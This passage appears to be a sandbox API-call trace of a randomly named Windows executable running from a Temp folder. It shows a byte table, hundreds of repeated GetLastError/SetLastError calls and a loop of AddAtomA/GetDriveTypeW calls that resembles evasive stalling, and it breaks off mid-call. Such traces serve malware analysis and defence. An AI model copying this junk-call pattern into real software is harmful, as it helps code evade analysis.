x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x62\x83\x0f\x75\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.122] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0113.138] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW 